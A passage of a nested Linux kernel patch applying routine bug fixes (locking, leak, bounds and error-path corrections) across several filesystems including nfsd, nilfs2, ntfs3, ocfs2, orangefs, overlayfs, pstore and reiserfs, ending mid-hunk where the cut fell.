+index 8beb2bc4c328f..32fe7cbfb28b3 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -1133,6 +1133,8 @@ nfsd4_setattr(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 				0, (time64_t)0);
+ 	if (!status)
+ 		status = nfserrno(attrs.na_labelerr);
++	if (!status)
++		status = nfserrno(attrs.na_aclerr);
+ out:
+ 	nfsd_attrs_free(&attrs);
+ 	fh_drop_write(&cstate->current_fh);
+@@ -1644,6 +1646,7 @@ static ssize_t _nfsd_copy_file_range(struct nfsd4_copy *copy,
+ 	u64 src_pos = copy->cp_src_pos;
+ 	u64 dst_pos = copy->cp_dst_pos;
+ 	int status;
++	loff_t end;
+ 
+ 	/* See RFC 7862 p.67: */
+ 	if (bytes_total == 0)
+@@ -1663,8 +1666,8 @@ static ssize_t _nfsd_copy_file_range(struct nfsd4_copy *copy,
+ 	/* for a non-zero asynchronous copy do a commit of data */
+ 	if (nfsd4_copy_is_async(copy) && copy->cp_res.wr_bytes_written > 0) {
+ 		since = READ_ONCE(dst->f_wb_err);
+-		status = vfs_fsync_range(dst, copy->cp_dst_pos,
+-					 copy->cp_res.wr_bytes_written, 0);
++		end = copy->cp_dst_pos + copy->cp_res.wr_bytes_written - 1;
++		status = vfs_fsync_range(dst, copy->cp_dst_pos, end, 0);
+ 		if (!status)
+ 			status = filemap_check_wb_err(dst->f_mapping, since);
+ 		if (!status)
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index 836bd825ca4ad..52b5552d0d70e 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -675,15 +675,26 @@ find_any_file(struct nfs4_file *f)
+ 	return ret;
+ }
+ 
+-static struct nfsd_file *find_deleg_file(struct nfs4_file *f)
++static struct nfsd_file *find_any_file_locked(struct nfs4_file *f)
+ {
+-	struct nfsd_file *ret = NULL;
++	lockdep_assert_held(&f->fi_lock);
++
++	if (f->fi_fds[O_RDWR])
++		return f->fi_fds[O_RDWR];
++	if (f->fi_fds[O_WRONLY])
++		return f->fi_fds[O_WRONLY];
++	if (f->fi_fds[O_RDONLY])
++		return f->fi_fds[O_RDONLY];
++	return NULL;
++}
++
++static struct nfsd_file *find_deleg_file_locked(struct nfs4_file *f)
++{
++	lockdep_assert_held(&f->fi_lock);
+ 
+-	spin_lock(&f->fi_lock);
+ 	if (f->fi_deleg_file)
+-		ret = nfsd_file_get(f->fi_deleg_file);
+-	spin_unlock(&f->fi_lock);
+-	return ret;
++		return f->fi_deleg_file;
++	return NULL;
+ }
+ 
+ static atomic_long_t num_delegations;
+@@ -2613,9 +2624,11 @@ static int nfs4_show_open(struct seq_file *s, struct nfs4_stid *st)
+ 	ols = openlockstateid(st);
+ 	oo = ols->st_stateowner;
+ 	nf = st->sc_file;
+-	file = find_any_file(nf);
++
++	spin_lock(&nf->fi_lock);
++	file = find_any_file_locked(nf);
+ 	if (!file)
+-		return 0;
++		goto out;
+ 
+ 	seq_printf(s, "- ");
+ 	nfs4_show_stateid(s, &st->sc_stateid);
+@@ -2637,8 +2650,8 @@ static int nfs4_show_open(struct seq_file *s, struct nfs4_stid *st)
+ 	seq_printf(s, ", ");
+ 	nfs4_show_owner(s, oo);
+ 	seq_printf(s, " }\n");
+-	nfsd_file_put(file);
+-
++out:
++	spin_unlock(&nf->fi_lock);
+ 	return 0;
+ }
+ 
+@@ -2652,9 +2665,10 @@ static int nfs4_show_lock(struct seq_file *s, struct nfs4_stid *st)
+ 	ols = openlockstateid(st);
+ 	oo = ols->st_stateowner;
+ 	nf = st->sc_file;
+-	file = find_any_file(nf);
++	spin_lock(&nf->fi_lock);
++	file = find_any_file_locked(nf);
+ 	if (!file)
+-		return 0;
++		goto out;
+ 
+ 	seq_printf(s, "- ");
+ 	nfs4_show_stateid(s, &st->sc_stateid);
+@@ -2674,8 +2688,8 @@ static int nfs4_show_lock(struct seq_file *s, struct nfs4_stid *st)
+ 	seq_printf(s, ", ");
+ 	nfs4_show_owner(s, oo);
+ 	seq_printf(s, " }\n");
+-	nfsd_file_put(file);
+-
++out:
++	spin_unlock(&nf->fi_lock);
+ 	return 0;
+ }
+ 
+@@ -2687,9 +2701,10 @@ static int nfs4_show_deleg(struct seq_file *s, struct nfs4_stid *st)
+ 
+ 	ds = delegstateid(st);
+ 	nf = st->sc_file;
+-	file = find_deleg_file(nf);
++	spin_lock(&nf->fi_lock);
++	file = find_deleg_file_locked(nf);
+ 	if (!file)
+-		return 0;
++		goto out;
+ 
+ 	seq_printf(s, "- ");
+ 	nfs4_show_stateid(s, &st->sc_stateid);
+@@ -2705,8 +2720,8 @@ static int nfs4_show_deleg(struct seq_file *s, struct nfs4_stid *st)
+ 	seq_printf(s, ", ");
+ 	nfs4_show_fname(s, file);
+ 	seq_printf(s, " }\n");
+-	nfsd_file_put(file);
+-
++out:
++	spin_unlock(&nf->fi_lock);
+ 	return 0;
+ }
+ 
+diff --git a/fs/nilfs2/the_nilfs.c b/fs/nilfs2/the_nilfs.c
+index c8b89b4f94e0e..2064e6473d304 100644
+--- a/fs/nilfs2/the_nilfs.c
++++ b/fs/nilfs2/the_nilfs.c
+@@ -13,6 +13,7 @@
+ #include <linux/blkdev.h>
+ #include <linux/backing-dev.h>
+ #include <linux/random.h>
++#include <linux/log2.h>
+ #include <linux/crc32.h>
+ #include "nilfs.h"
+ #include "segment.h"
+@@ -192,6 +193,34 @@ static int nilfs_store_log_cursor(struct the_nilfs *nilfs,
+ 	return ret;
+ }
+ 
++/**
++ * nilfs_get_blocksize - get block size from raw superblock data
++ * @sb: super block instance
++ * @sbp: superblock raw data buffer
++ * @blocksize: place to store block size
++ *
++ * nilfs_get_blocksize() calculates the block size from the block size
++ * exponent information written in @sbp and stores it in @blocksize,
++ * or aborts with an error message if it's too large.
++ *
++ * Return Value: On success, 0 is returned. If the block size is too
++ * large, -EINVAL is returned.
++ */
++static int nilfs_get_blocksize(struct super_block *sb,
++			       struct nilfs_super_block *sbp, int *blocksize)
++{
++	unsigned int shift_bits = le32_to_cpu(sbp->s_log_block_size);
++
++	if (unlikely(shift_bits >
++		     ilog2(NILFS_MAX_BLOCK_SIZE) - BLOCK_SIZE_BITS)) {
++		nilfs_err(sb, "too large filesystem blocksize: 2 ^ %u KiB",
++			  shift_bits);
++		return -EINVAL;
++	}
++	*blocksize = BLOCK_SIZE << shift_bits;
++	return 0;
++}
++
+ /**
+  * load_nilfs - load and recover the nilfs
+  * @nilfs: the_nilfs structure to be released
+@@ -245,11 +274,15 @@ int load_nilfs(struct the_nilfs *nilfs, struct super_block *sb)
+ 		nilfs->ns_sbwtime = le64_to_cpu(sbp[0]->s_wtime);
+ 
+ 		/* verify consistency between two super blocks */
+-		blocksize = BLOCK_SIZE << le32_to_cpu(sbp[0]->s_log_block_size);
++		err = nilfs_get_blocksize(sb, sbp[0], &blocksize);
++		if (err)
++			goto scan_error;
++
+ 		if (blocksize != nilfs->ns_blocksize) {
+ 			nilfs_warn(sb,
+ 				   "blocksize differs between two super blocks (%d != %d)",
+ 				   blocksize, nilfs->ns_blocksize);
++			err = -EINVAL;
+ 			goto scan_error;
+ 		}
+ 
+@@ -443,11 +476,33 @@ static int nilfs_valid_sb(struct nilfs_super_block *sbp)
+ 	return crc == le32_to_cpu(sbp->s_sum);
+ }
+ 
+-static int nilfs_sb2_bad_offset(struct nilfs_super_block *sbp, u64 offset)
++/**
++ * nilfs_sb2_bad_offset - check the location of the second superblock
++ * @sbp: superblock raw data buffer
++ * @offset: byte offset of second superblock calculated from device size
++ *
++ * nilfs_sb2_bad_offset() checks if the position on the second
++ * superblock is valid or not based on the filesystem parameters
++ * stored in @sbp.  If @offset points to a location within the segment
++ * area, or if the parameters themselves are not normal, it is
++ * determined to be invalid.
++ *
++ * Return Value: true if invalid, false if valid.
++ */
++static bool nilfs_sb2_bad_offset(struct nilfs_super_block *sbp, u64 offset)
+ {
+-	return offset < ((le64_to_cpu(sbp->s_nsegments) *
+-			  le32_to_cpu(sbp->s_blocks_per_segment)) <<
+-			 (le32_to_cpu(sbp->s_log_block_size) + 10));
++	unsigned int shift_bits = le32_to_cpu(sbp->s_log_block_size);
++	u32 blocks_per_segment = le32_to_cpu(sbp->s_blocks_per_segment);
++	u64 nsegments = le64_to_cpu(sbp->s_nsegments);
++	u64 index;
++
++	if (blocks_per_segment < NILFS_SEG_MIN_BLOCKS ||
++	    shift_bits > ilog2(NILFS_MAX_BLOCK_SIZE) - BLOCK_SIZE_BITS)
++		return true;
++
++	index = offset >> (shift_bits + BLOCK_SIZE_BITS);
++	do_div(index, blocks_per_segment);
++	return index < nsegments;
+ }
+ 
+ static void nilfs_release_super_block(struct the_nilfs *nilfs)
+@@ -586,9 +641,11 @@ int init_nilfs(struct the_nilfs *nilfs, struct super_block *sb, char *data)
+ 	if (err)
+ 		goto failed_sbh;
+ 
+-	blocksize = BLOCK_SIZE << le32_to_cpu(sbp->s_log_block_size);
+-	if (blocksize < NILFS_MIN_BLOCK_SIZE ||
+-	    blocksize > NILFS_MAX_BLOCK_SIZE) {
++	err = nilfs_get_blocksize(sb, sbp, &blocksize);
++	if (err)
++		goto failed_sbh;
++
++	if (blocksize < NILFS_MIN_BLOCK_SIZE) {
+ 		nilfs_err(sb,
+ 			  "couldn't mount because of unsupported filesystem blocksize %d",
+ 			  blocksize);
+diff --git a/fs/ntfs3/bitmap.c b/fs/ntfs3/bitmap.c
+index e92bbd754365e..1930640be31a8 100644
+--- a/fs/ntfs3/bitmap.c
++++ b/fs/ntfs3/bitmap.c
+@@ -1424,7 +1424,7 @@ int ntfs_trim_fs(struct ntfs_sb_info *sbi, struct fstrim_range *range)
+ 
+ 	down_read_nested(&wnd->rw_lock, BITMAP_MUTEX_CLUSTERS);
+ 
+-	for (; iw < wnd->nbits; iw++, wbit = 0) {
++	for (; iw < wnd->nwnd; iw++, wbit = 0) {
+ 		CLST lcn_wnd = iw * wbits;
+ 		struct buffer_head *bh;
+ 
+diff --git a/fs/ntfs3/super.c b/fs/ntfs3/super.c
+index 47012c9bf505e..adc4f73722b7c 100644
+--- a/fs/ntfs3/super.c
++++ b/fs/ntfs3/super.c
+@@ -672,7 +672,7 @@ static u32 true_sectors_per_clst(const struct NTFS_BOOT *boot)
+ 	if (boot->sectors_per_clusters <= 0x80)
+ 		return boot->sectors_per_clusters;
+ 	if (boot->sectors_per_clusters >= 0xf4) /* limit shift to 2MB max */
+-		return 1U << (0 - boot->sectors_per_clusters);
++		return 1U << -(s8)boot->sectors_per_clusters;
+ 	return -EINVAL;
+ }
+ 
+diff --git a/fs/ntfs3/xattr.c b/fs/ntfs3/xattr.c
+index 7de8718c68a90..ea582b4fe1d9d 100644
+--- a/fs/ntfs3/xattr.c
++++ b/fs/ntfs3/xattr.c
+@@ -107,7 +107,7 @@ static int ntfs_read_ea(struct ntfs_inode *ni, struct EA_FULL **ea,
+ 		return -EFBIG;
+ 
+ 	/* Allocate memory for packed Ea. */
+-	ea_p = kmalloc(size + add_bytes, GFP_NOFS);
++	ea_p = kmalloc(size_add(size, add_bytes), GFP_NOFS);
+ 	if (!ea_p)
+ 		return -ENOMEM;
+ 
+diff --git a/fs/ocfs2/journal.c b/fs/ocfs2/journal.c
+index 126671e6caeda..3fb98b4569a28 100644
+--- a/fs/ocfs2/journal.c
++++ b/fs/ocfs2/journal.c
+@@ -157,7 +157,7 @@ static void ocfs2_queue_replay_slots(struct ocfs2_super *osb,
+ 	replay_map->rm_state = REPLAY_DONE;
+ }
+ 
+-static void ocfs2_free_replay_slots(struct ocfs2_super *osb)
++void ocfs2_free_replay_slots(struct ocfs2_super *osb)
+ {
+ 	struct ocfs2_replay_map *replay_map = osb->replay_map;
+ 
+diff --git a/fs/ocfs2/journal.h b/fs/ocfs2/journal.h
+index 969d0aa287187..41c382f68529e 100644
+--- a/fs/ocfs2/journal.h
++++ b/fs/ocfs2/journal.h
+@@ -150,6 +150,7 @@ int ocfs2_recovery_init(struct ocfs2_super *osb);
+ void ocfs2_recovery_exit(struct ocfs2_super *osb);
+ 
+ int ocfs2_compute_replay_slots(struct ocfs2_super *osb);
++void ocfs2_free_replay_slots(struct ocfs2_super *osb);
+ /*
+  *  Journal Control:
+  *  Initialize, Load, Shutdown, Wipe a journal.
+diff --git a/fs/ocfs2/stackglue.c b/fs/ocfs2/stackglue.c
+index 317126261523b..a8d5ca98fa57c 100644
+--- a/fs/ocfs2/stackglue.c
++++ b/fs/ocfs2/stackglue.c
+@@ -669,6 +669,8 @@ static struct ctl_table_header *ocfs2_table_header;
+ 
+ static int __init ocfs2_stack_glue_init(void)
+ {
++	int ret;
++
+ 	strcpy(cluster_stack_name, OCFS2_STACK_PLUGIN_O2CB);
+ 
+ 	ocfs2_table_header = register_sysctl("fs/ocfs2/nm", ocfs2_nm_table);
+@@ -678,7 +680,11 @@ static int __init ocfs2_stack_glue_init(void)
+ 		return -ENOMEM; /* or something. */
+ 	}
+ 
+-	return ocfs2_sysfs_init();
++	ret = ocfs2_sysfs_init();
++	if (ret)
++		unregister_sysctl_table(ocfs2_table_header);
++
++	return ret;
+ }
+ 
+ static void __exit ocfs2_stack_glue_exit(void)
+diff --git a/fs/ocfs2/super.c b/fs/ocfs2/super.c
+index 42c993e53924f..0b0e6a1321018 100644
+--- a/fs/ocfs2/super.c
++++ b/fs/ocfs2/super.c
+@@ -1159,6 +1159,7 @@ static int ocfs2_fill_super(struct super_block *sb, void *data, int silent)
+ out_dismount:
+ 	atomic_set(&osb->vol_state, VOLUME_DISABLED);
+ 	wake_up(&osb->osb_mount_event);
++	ocfs2_free_replay_slots(osb);
+ 	ocfs2_dismount_volume(sb, 1);
+ 	goto out;
+ 
+@@ -1822,12 +1823,14 @@ static int ocfs2_mount_volume(struct super_block *sb)
+ 	status = ocfs2_truncate_log_init(osb);
+ 	if (status < 0) {
+ 		mlog_errno(status);
+-		goto out_system_inodes;
++		goto out_check_volume;
+ 	}
+ 
+ 	ocfs2_super_unlock(osb, 1);
+ 	return 0;
+ 
++out_check_volume:
++	ocfs2_free_replay_slots(osb);
+ out_system_inodes:
+ 	if (osb->local_alloc_state == OCFS2_LA_ENABLED)
+ 		ocfs2_shutdown_local_alloc(osb);
+diff --git a/fs/orangefs/orangefs-debugfs.c b/fs/orangefs/orangefs-debugfs.c
+index 29eaa45443727..1b508f5433846 100644
+--- a/fs/orangefs/orangefs-debugfs.c
++++ b/fs/orangefs/orangefs-debugfs.c
+@@ -194,15 +194,10 @@ void orangefs_debugfs_init(int debug_mask)
+  */
+ static void orangefs_kernel_debug_init(void)
+ {
+-	int rc = -ENOMEM;
+-	char *k_buffer = NULL;
++	static char k_buffer[ORANGEFS_MAX_DEBUG_STRING_LEN] = { };
+ 
+ 	gossip_debug(GOSSIP_DEBUGFS_DEBUG, "%s: start\n", __func__);
+ 
+-	k_buffer = kzalloc(ORANGEFS_MAX_DEBUG_STRING_LEN, GFP_KERNEL);
+-	if (!k_buffer)
+-		goto out;
+-
+ 	if (strlen(kernel_debug_string) + 1 < ORANGEFS_MAX_DEBUG_STRING_LEN) {
+ 		strcpy(k_buffer, kernel_debug_string);
+ 		strcat(k_buffer, "\n");
+@@ -213,15 +208,14 @@ static void orangefs_kernel_debug_init(void)
+ 
+ 	debugfs_create_file(ORANGEFS_KMOD_DEBUG_FILE, 0444, debug_dir, k_buffer,
+ 			    &kernel_debug_fops);
+-
+-out:
+-	gossip_debug(GOSSIP_DEBUGFS_DEBUG, "%s: rc:%d:\n", __func__, rc);
+ }
+ 
+ 
+ void orangefs_debugfs_cleanup(void)
+ {
+ 	debugfs_remove_recursive(debug_dir);
++	kfree(debug_help_string);
++	debug_help_string = NULL;
+ }
+ 
+ /* open ORANGEFS_KMOD_DEBUG_HELP_FILE */
+@@ -297,18 +291,13 @@ static int help_show(struct seq_file *m, void *v)
+ /*
+  * initialize the client-debug file.
+  */
+-static int orangefs_client_debug_init(void)
++static void orangefs_client_debug_init(void)
+ {
+ 
+-	int rc = -ENOMEM;
+-	char *c_buffer = NULL;
++	static char c_buffer[ORANGEFS_MAX_DEBUG_STRING_LEN] = { };
+ 
+ 	gossip_debug(GOSSIP_DEBUGFS_DEBUG, "%s: start\n", __func__);
+ 
+-	c_buffer = kzalloc(ORANGEFS_MAX_DEBUG_STRING_LEN, GFP_KERNEL);
+-	if (!c_buffer)
+-		goto out;
+-
+ 	if (strlen(client_debug_string) + 1 < ORANGEFS_MAX_DEBUG_STRING_LEN) {
+ 		strcpy(c_buffer, client_debug_string);
+ 		strcat(c_buffer, "\n");
+@@ -322,13 +311,6 @@ static int orangefs_client_debug_init(void)
+ 						  debug_dir,
+ 						  c_buffer,
+ 						  &kernel_debug_fops);
+-
+-	rc = 0;
+-
+-out:
+-
+-	gossip_debug(GOSSIP_DEBUGFS_DEBUG, "%s: rc:%d:\n", __func__, rc);
+-	return rc;
+ }
+ 
+ /* open ORANGEFS_KMOD_DEBUG_FILE or ORANGEFS_CLIENT_DEBUG_FILE.*/
+@@ -671,6 +653,7 @@ int orangefs_prepare_debugfs_help_string(int at_boot)
+ 		memset(debug_help_string, 0, DEBUG_HELP_STRING_SIZE);
+ 		strlcat(debug_help_string, new, string_size);
+ 		mutex_unlock(&orangefs_help_file_lock);
++		kfree(new);
+ 	}
+ 
+ 	rc = 0;
+diff --git a/fs/orangefs/orangefs-mod.c b/fs/orangefs/orangefs-mod.c
+index cd7297815f91e..5ab741c60b7e2 100644
+--- a/fs/orangefs/orangefs-mod.c
++++ b/fs/orangefs/orangefs-mod.c
+@@ -141,7 +141,7 @@ static int __init orangefs_init(void)
+ 		gossip_err("%s: could not initialize device subsystem %d!\n",
+ 			   __func__,
+ 			   ret);
+-		goto cleanup_device;
++		goto cleanup_sysfs;
+ 	}
+ 
+ 	ret = register_filesystem(&orangefs_fs_type);
+@@ -152,11 +152,11 @@ static int __init orangefs_init(void)
+ 		goto out;
+ 	}
+ 
+-	orangefs_sysfs_exit();
+-
+-cleanup_device:
+ 	orangefs_dev_cleanup();
+ 
++cleanup_sysfs:
++	orangefs_sysfs_exit();
++
+ sysfs_init_failed:
+ 	orangefs_debugfs_cleanup();
+ 
+diff --git a/fs/orangefs/orangefs-sysfs.c b/fs/orangefs/orangefs-sysfs.c
+index de80b62553bb1..be4ba03a01a0f 100644
+--- a/fs/orangefs/orangefs-sysfs.c
++++ b/fs/orangefs/orangefs-sysfs.c
+@@ -896,9 +896,18 @@ static struct attribute *orangefs_default_attrs[] = {
+ };
+ ATTRIBUTE_GROUPS(orangefs_default);
+ 
++static struct kobject *orangefs_obj;
++
++static void orangefs_obj_release(struct kobject *kobj)
++{
++	kfree(orangefs_obj);
++	orangefs_obj = NULL;
++}
++
+ static struct kobj_type orangefs_ktype = {
+ 	.sysfs_ops = &orangefs_sysfs_ops,
+ 	.default_groups = orangefs_default_groups,
++	.release = orangefs_obj_release,
+ };
+ 
+ static struct orangefs_attribute acache_hard_limit_attribute =
+@@ -934,9 +943,18 @@ static struct attribute *acache_orangefs_default_attrs[] = {
+ };
+ ATTRIBUTE_GROUPS(acache_orangefs_default);
+ 
++static struct kobject *acache_orangefs_obj;
++
++static void acache_orangefs_obj_release(struct kobject *kobj)
++{
++	kfree(acache_orangefs_obj);
++	acache_orangefs_obj = NULL;
++}
++
+ static struct kobj_type acache_orangefs_ktype = {
+ 	.sysfs_ops = &orangefs_sysfs_ops,
+ 	.default_groups = acache_orangefs_default_groups,
++	.release = acache_orangefs_obj_release,
+ };
+ 
+ static struct orangefs_attribute capcache_hard_limit_attribute =
+@@ -972,9 +990,18 @@ static struct attribute *capcache_orangefs_default_attrs[] = {
+ };
+ ATTRIBUTE_GROUPS(capcache_orangefs_default);
+ 
++static struct kobject *capcache_orangefs_obj;
++
++static void capcache_orangefs_obj_release(struct kobject *kobj)
++{
++	kfree(capcache_orangefs_obj);
++	capcache_orangefs_obj = NULL;
++}
++
+ static struct kobj_type capcache_orangefs_ktype = {
+ 	.sysfs_ops = &orangefs_sysfs_ops,
+ 	.default_groups = capcache_orangefs_default_groups,
++	.release = capcache_orangefs_obj_release,
+ };
+ 
+ static struct orangefs_attribute ccache_hard_limit_attribute =
+@@ -1010,9 +1037,18 @@ static struct attribute *ccache_orangefs_default_attrs[] = {
+ };
+ ATTRIBUTE_GROUPS(ccache_orangefs_default);
+ 
++static struct kobject *ccache_orangefs_obj;
++
++static void ccache_orangefs_obj_release(struct kobject *kobj)
++{
++	kfree(ccache_orangefs_obj);
++	ccache_orangefs_obj = NULL;
++}
++
+ static struct kobj_type ccache_orangefs_ktype = {
+ 	.sysfs_ops = &orangefs_sysfs_ops,
+ 	.default_groups = ccache_orangefs_default_groups,
++	.release = ccache_orangefs_obj_release,
+ };
+ 
+ static struct orangefs_attribute ncache_hard_limit_attribute =
+@@ -1048,9 +1084,18 @@ static struct attribute *ncache_orangefs_default_attrs[] = {
+ };
+ ATTRIBUTE_GROUPS(ncache_orangefs_default);
+ 
++static struct kobject *ncache_orangefs_obj;
++
++static void ncache_orangefs_obj_release(struct kobject *kobj)
++{
++	kfree(ncache_orangefs_obj);
++	ncache_orangefs_obj = NULL;
++}
++
+ static struct kobj_type ncache_orangefs_ktype = {
+ 	.sysfs_ops = &orangefs_sysfs_ops,
+ 	.default_groups = ncache_orangefs_default_groups,
++	.release = ncache_orangefs_obj_release,
+ };
+ 
+ static struct orangefs_attribute pc_acache_attribute =
+@@ -1079,9 +1124,18 @@ static struct attribute *pc_orangefs_default_attrs[] = {
+ };
+ ATTRIBUTE_GROUPS(pc_orangefs_default);
+ 
++static struct kobject *pc_orangefs_obj;
++
++static void pc_orangefs_obj_release(struct kobject *kobj)
++{
++	kfree(pc_orangefs_obj);
++	pc_orangefs_obj = NULL;
++}
++
+ static struct kobj_type pc_orangefs_ktype = {
+ 	.sysfs_ops = &orangefs_sysfs_ops,
+ 	.default_groups = pc_orangefs_default_groups,
++	.release = pc_orangefs_obj_release,
+ };
+ 
+ static struct orangefs_attribute stats_reads_attribute =
+@@ -1103,19 +1157,20 @@ static struct attribute *stats_orangefs_default_attrs[] = {
+ };
+ ATTRIBUTE_GROUPS(stats_orangefs_default);
+ 
++static struct kobject *stats_orangefs_obj;
++
++static void stats_orangefs_obj_release(struct kobject *kobj)
++{
++	kfree(stats_orangefs_obj);
++	stats_orangefs_obj = NULL;
++}
++
+ static struct kobj_type stats_orangefs_ktype = {
+ 	.sysfs_ops = &orangefs_sysfs_ops,
+ 	.default_groups = stats_orangefs_default_groups,
++	.release = stats_orangefs_obj_release,
+ };
+ 
+-static struct kobject *orangefs_obj;
+-static struct kobject *acache_orangefs_obj;
+-static struct kobject *capcache_orangefs_obj;
+-static struct kobject *ccache_orangefs_obj;
+-static struct kobject *ncache_orangefs_obj;
+-static struct kobject *pc_orangefs_obj;
+-static struct kobject *stats_orangefs_obj;
+-
+ int orangefs_sysfs_init(void)
+ {
+ 	int rc = -EINVAL;
+diff --git a/fs/overlayfs/file.c b/fs/overlayfs/file.c
+index a1a22f58ba183..d066be3b9226e 100644
+--- a/fs/overlayfs/file.c
++++ b/fs/overlayfs/file.c
+@@ -517,9 +517,16 @@ static long ovl_fallocate(struct file *file, int mode, loff_t offset, loff_t len
+ 	const struct cred *old_cred;
+ 	int ret;
+ 
++	inode_lock(inode);
++	/* Update mode */
++	ovl_copyattr(inode);
++	ret = file_remove_privs(file);
++	if (ret)
++		goto out_unlock;
++
+ 	ret = ovl_real_fdget(file, &real);
+ 	if (ret)
+-		return ret;
++		goto out_unlock;
+ 
+ 	old_cred = ovl_override_creds(file_inode(file)->i_sb);
+ 	ret = vfs_fallocate(real.file, mode, offset, len);
+@@ -530,6 +537,9 @@ static long ovl_fallocate(struct file *file, int mode, loff_t offset, loff_t len
+ 
+ 	fdput(real);
+ 
++out_unlock:
++	inode_unlock(inode);
++
+ 	return ret;
+ }
+ 
+@@ -567,14 +577,23 @@ static loff_t ovl_copyfile(struct file *file_in, loff_t pos_in,
+ 	const struct cred *old_cred;
+ 	loff_t ret;
+ 
++	inode_lock(inode_out);
++	if (op != OVL_DEDUPE) {
++		/* Update mode */
++		ovl_copyattr(inode_out);
++		ret = file_remove_privs(file_out);
++		if (ret)
++			goto out_unlock;
++	}
++
+ 	ret = ovl_real_fdget(file_out, &real_out);
+ 	if (ret)
+-		return ret;
++		goto out_unlock;
+ 
+ 	ret = ovl_real_fdget(file_in, &real_in);
+ 	if (ret) {
+ 		fdput(real_out);
+-		return ret;
++		goto out_unlock;
+ 	}
+ 
+ 	old_cred = ovl_override_creds(file_inode(file_out)->i_sb);
+@@ -603,6 +622,9 @@ static loff_t ovl_copyfile(struct file *file_in, loff_t pos_in,
+ 	fdput(real_in);
+ 	fdput(real_out);
+ 
++out_unlock:
++	inode_unlock(inode_out);
++
+ 	return ret;
+ }
+ 
+diff --git a/fs/overlayfs/super.c b/fs/overlayfs/super.c
+index a29a8afe9b262..3d14a3f1465d1 100644
+--- a/fs/overlayfs/super.c
++++ b/fs/overlayfs/super.c
+@@ -139,11 +139,16 @@ static int ovl_dentry_revalidate_common(struct dentry *dentry,
+ 					unsigned int flags, bool weak)
+ {
+ 	struct ovl_entry *oe = dentry->d_fsdata;
++	struct inode *inode = d_inode_rcu(dentry);
+ 	struct dentry *upper;
+ 	unsigned int i;
+ 	int ret = 1;
+ 
+-	upper = ovl_dentry_upper(dentry);
++	/* Careful in RCU mode */
++	if (!inode)
++		return -ECHILD;
++
++	upper = ovl_i_dentry_upper(inode);
+ 	if (upper)
+ 		ret = ovl_revalidate_real(upper, flags, weak);
+ 
+diff --git a/fs/pstore/Kconfig b/fs/pstore/Kconfig
+index 8adabde685f13..c49d554cc9ae9 100644
+--- a/fs/pstore/Kconfig
++++ b/fs/pstore/Kconfig
+@@ -126,6 +126,7 @@ config PSTORE_CONSOLE
+ config PSTORE_PMSG
+ 	bool "Log user space messages"
+ 	depends on PSTORE
++	select RT_MUTEXES
+ 	help
+ 	  When the option is enabled, pstore will export a character
+ 	  interface /dev/pmsg0 to log user space messages. On reboot
+diff --git a/fs/pstore/pmsg.c b/fs/pstore/pmsg.c
+index d8542ec2f38c6..18cf94b597e05 100644
+--- a/fs/pstore/pmsg.c
++++ b/fs/pstore/pmsg.c
+@@ -7,9 +7,10 @@
+ #include <linux/device.h>
+ #include <linux/fs.h>
+ #include <linux/uaccess.h>
++#include <linux/rtmutex.h>
+ #include "internal.h"
+ 
+-static DEFINE_MUTEX(pmsg_lock);
++static DEFINE_RT_MUTEX(pmsg_lock);
+ 
+ static ssize_t write_pmsg(struct file *file, const char __user *buf,
+ 			  size_t count, loff_t *ppos)
+@@ -28,9 +29,9 @@ static ssize_t write_pmsg(struct file *file, const char __user *buf,
+ 	if (!access_ok(buf, count))
+ 		return -EFAULT;
+ 
+-	mutex_lock(&pmsg_lock);
++	rt_mutex_lock(&pmsg_lock);
+ 	ret = psinfo->write_user(&record, buf);
+-	mutex_unlock(&pmsg_lock);
++	rt_mutex_unlock(&pmsg_lock);
+ 	return ret ? ret : count;
+ }
+ 
+diff --git a/fs/pstore/ram.c b/fs/pstore/ram.c
+index fefe3d391d3af..74e4d93f3e08d 100644
+--- a/fs/pstore/ram.c
++++ b/fs/pstore/ram.c
+@@ -735,6 +735,7 @@ static int ramoops_probe(struct platform_device *pdev)
+ 	/* Make sure we didn't get bogus platform data pointer. */
+ 	if (!pdata) {
+ 		pr_err("NULL platform data\n");
++		err = -EINVAL;
+ 		goto fail_out;
+ 	}
+ 
+@@ -742,6 +743,7 @@ static int ramoops_probe(struct platform_device *pdev)
+ 			!pdata->ftrace_size && !pdata->pmsg_size)) {
+ 		pr_err("The memory size and the record/console size must be "
+ 			"non-zero\n");
++		err = -EINVAL;
+ 		goto fail_out;
+ 	}
+ 
+diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c
+index a89e33719fcf2..8bf09886e7e66 100644
+--- a/fs/pstore/ram_core.c
++++ b/fs/pstore/ram_core.c
+@@ -439,7 +439,11 @@ static void *persistent_ram_vmap(phys_addr_t start, size_t size,
+ 		phys_addr_t addr = page_start + i * PAGE_SIZE;
+ 		pages[i] = pfn_to_page(addr >> PAGE_SHIFT);
+ 	}
+-	vaddr = vmap(pages, page_count, VM_MAP, prot);
++	/*
++	 * VM_IOREMAP used here to bypass this region during vread()
++	 * and kmap_atomic() (i.e. kcore) to avoid __va() failures.
++	 */
++	vaddr = vmap(pages, page_count, VM_MAP | VM_IOREMAP, prot);
+ 	kfree(pages);
+ 
+ 	/*
+diff --git a/fs/reiserfs/namei.c b/fs/reiserfs/namei.c
+index 3d7a35d6a18bc..b916859992ec8 100644
+--- a/fs/reiserfs/namei.c
++++ b/fs/reiserfs/namei.c
+@@ -696,6 +696,7 @@ static int reiserfs_create(struct user_namespace *mnt_userns, struct inode *dir,
+ 
+ out_failed:
+ 	reiserfs_write_unlock(dir->i_sb);
++	reiserfs_security_free(&security);
+ 	return retval;
+ }
+ 
+@@ -779,6 +780,7 @@ static int reiserfs_mknod(struct user_namespace *mnt_userns, struct inode *dir,
+ 
+ out_failed:
+ 	reiserfs_write_unlock(dir->i_sb);
++	reiserfs_security_free(&security);
+ 	return retval;
+ }
+ 
+@@ -878,6 +880,7 @@ static int reiserfs_mkdir(struct user_namespace *mnt_userns, struct inode *dir,
+ 	retval = journal_end(&th);
+ out_failed:
+ 	reiserfs_write_unlock(dir->i_sb);
++	reiserfs_security_free(&security);
+ 	return retval;
+ }
+ 
+@@ -1194,6 +1197,7 @@ static int reiserfs_symlink(struct user_namespace *mnt_userns,
+ 	retval = journal_end(&th);
+ out_failed:
